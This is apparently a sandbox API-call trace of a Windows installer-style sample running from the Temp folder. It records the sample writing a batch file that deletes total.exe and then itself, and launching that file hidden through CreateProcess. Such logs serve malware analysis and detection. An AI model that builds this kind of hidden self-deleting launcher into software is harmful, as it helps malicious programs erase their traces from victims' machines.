lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.537] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned 46 [0160.537] lstrcpynA (in: lpString1=0x40a818, lpString2="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\r\n", iMaxLength=1024 | out: lpString1="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\r\n") returned="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\r\n" [0160.537] lstrlenA (lpString="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\r\n") returned 52 [0160.537] WriteFile (in: hFile=0x194, lpBuffer=0x40a818*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x18fbd8, lpOverlapped=0x0 | out: lpBuffer=0x40a818*, lpNumberOfBytesWritten=0x18fbd8*=0x34, lpOverlapped=0x0) returned 1 [0160.537] lstrcpynA (in: lpString1=0x42e3a9, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.537] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned 46 [0160.537] lstrcpynA (in: lpString1=0x40a818, lpString2="if exist C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe goto try\r\n", iMaxLength=1024 | out: lpString1="if exist C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe goto try\r\n") returned="if exist C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe goto try\r\n" [0160.537] lstrlenA (lpString="if exist C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe goto try\r\n") returned 66 [0160.537] WriteFile (in: hFile=0x194, lpBuffer=0x40a818*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x18fbd8, lpOverlapped=0x0 | out: lpBuffer=0x40a818*, lpNumberOfBytesWritten=0x18fbd8*=0x42, lpOverlapped=0x0) returned 1 [0160.537] lstrcpynA (in: lpString1=0x42e3a4, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.537] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 42 [0160.537] lstrcpynA (in: lpString1=0x40a818, lpString2="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat\r\n", iMaxLength=1024 | out: lpString1="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat\r\n") returned="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat\r\n" [0160.537] lstrlenA (lpString="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat\r\n") returned 48 [0160.537] WriteFile (in: hFile=0x194, lpBuffer=0x40a818*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18fbd8, lpOverlapped=0x0 | out: lpBuffer=0x40a818*, lpNumberOfBytesWritten=0x18fbd8*=0x30, lpOverlapped=0x0) returned 1 [0160.537] CloseHandle (hObject=0x194) returned 1 [0160.537] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.537] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 42 [0160.537] lstrcpynA (in: lpString1=0x3369ac, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.537] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.538] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.538] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.538] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.538] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.538] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.538] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.538] lstrcpynA (in: lpString1=0x336df4, lpString2="S", iMaxLength=1024 | out: lpString1="S") returned="S" [0160.538] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.538] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.538] lstrcpynA (in: lpString1=0x40a418, lpString2="Store", 
iMaxLength=1024 | out: lpString1="Store") returned="Store" [0160.538] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.538] GetProcAddress (hModule=0x75710000, lpProcName="Store") returned 0x757110e0 [0160.539] lstrcpynA (in: lpString1=0x336df4, lpString2="error", iMaxLength=1024 | out: lpString1="error") returned="error" [0160.539] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.539] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.539] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.539] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.539] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.539] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.539] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.539] lstrcpynA (in: lpString1=0x33723c, lpString2="72", iMaxLength=1024 | out: lpString1="72") returned="72" [0160.539] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.539] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.539] lstrcpynA (in: lpString1=0x40a418, lpString2="Alloc", iMaxLength=1024 | out: lpString1="Alloc") returned="Alloc" [0160.539] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.539] GetProcAddress (hModule=0x75710000, lpProcName="Alloc") returned 0x75711000 [0160.539] wsprintfA (in: param_1=0x18f98c, param_2="%d" | out: param_1="3098296") returned 7 [0160.540] lstrcpynA (in: lpString1=0x33723c, lpString2="3098296", iMaxLength=1024 | out: lpString1="3098296") returned="3098296" [0160.540] lstrcpynA (in: lpString1=0x430800, lpString2="3098296", iMaxLength=1024 | out: lpString1="3098296") returned="3098296" [0160.540] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.540] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.540] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.540] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.540] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.540] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.540] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.540] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3098296", iMaxLength=1024 | out: lpString1="3098296") returned="3098296" [0160.540] lstrlenA (lpString="3098296") returned 7 [0160.540] lstrcpynA (in: lpString1=0x33723c, lpString2="*3098296(i72)", iMaxLength=1024 | out: lpString1="*3098296(i72)") returned="*3098296(i72)" [0160.540] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.540] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.540] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0160.540] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.541] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0160.541] lstrcpyA (in: lpString1=0x33e508, lpString2="3098296" | out: lpString1="3098296") returned="3098296" [0160.541] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.541] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="72") returned 2 [0160.541] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.541] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.541] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.541] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.541] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.541] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.541] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.541] lstrcpynA (in: lpString1=0x33723c, lpString2="*(i,i,i,i)i.r3", iMaxLength=1024 | out: lpString1="*(i,i,i,i)i.r3") returned="*(i,i,i,i)i.r3" [0160.541] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.541] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.541] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0160.542] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.542] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0160.542] lstrcpyA (in: lpString1=0x33e508, lpString2="" | out: lpString1="") returned="" [0160.542] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.542] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.542] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.542] lstrcpynA (in: lpString1=0x3409f0, 
lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.542] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.542] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0160.542] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0160.542] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0160.542] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0160.542] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="3281864") returned 7 [0160.542] lstrcpyA (in: lpString1=0x430c00, lpString2="3281864" | out: lpString1="3281864") returned="3281864" [0160.542] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.543] lstrcpynA (in: lpString1=0x3369ac, lpString2="error", iMaxLength=1024 | out: lpString1="error") returned="error" [0160.543] lstrcpynA (in: lpString1=0x336df4, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.543] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.543] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") 
returned="" [0160.543] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.543] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.543] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.543] lstrcpynA (in: lpString1=0x33723c, lpString2="kernel32::CreateProcess(i0, ts, i0, i0, i0, i0x8000000, i0, i0, ir2, ir3)i.r4", iMaxLength=1024 | out: lpString1="kernel32::CreateProcess(i0, ts, i0, i0, i0, i0x8000000, i0, i0, ir2, ir3)i.r4") returned="kernel32::CreateProcess(i0, ts, i0, i0, i0, i0x8000000, i0, i0, ir2, ir3)i.r4" [0160.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.543] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.543] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", 
iMaxLength=1024 | out: lpString1="Call") returned="Call" [0160.543] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.544] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0160.544] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.544] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.544] lstrcpyA (in: lpString1=0x33e508, lpString2="CreateProcess" | out: lpString1="CreateProcess") returned="CreateProcess" [0160.544] lstrcpynA (in: lpString1=0x341200, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.544] lstrcpynA (in: lpString1=0x341608, lpString2="3098296", iMaxLength=1024 | out: lpString1="3098296") returned="3098296" [0160.544] lstrcpynA (in: lpString1=0x341608, lpString2="3281864", iMaxLength=1024 | out: lpString1="3281864") returned="3281864" [0160.544] lstrcpynA (in: lpString1=0x341608, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="3281864") returned 7 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="3098296") returned 7 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="0") returned 1 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="0") returned 1 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="134217728") returned 9 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="0") returned 1 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="0") returned 1 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="0") returned 1 [0160.556] 
lstrcpynA (in: lpString1=0x341608, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="0") returned 1 [0160.556] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="1") returned 1 [0160.556] lstrcpyA (in: lpString1=0x431000, lpString2="1" | out: lpString1="1") returned="1" [0160.557] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.557] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.557] lstrcpyA (in: lpString1=0x33e508, lpString2="GetExitCodeProcess" | out: lpString1="GetExitCodeProcess") returned="GetExitCodeProcess" [0160.558] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0160.558] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1") returned 1 [0160.558] lstrcpyA (in: lpString1=0x341608, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.559] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.559] lstrcpyA (in: lpString1=0x33e508, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0160.559] wsprintfA (in: param_1=0x341608, param_2="%d" | out: param_1="1") returned 1 [0160.560] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0160.560] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0160.560] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0160.560] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpFindFileData=0x42c0c0 | out: 
lpFindFileData=0x42c0c0) returned 0x2e7a78 [0160.560] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0160.561] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0160.561] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0160.561] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0160.561] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local") returned 31 [0160.561] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2f0ea8 [0160.561] FindClose (in: hFindFile=0x2f0ea8 | out: hFindFile=0x2f0ea8) returned 1 [0160.561] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData") returned 25 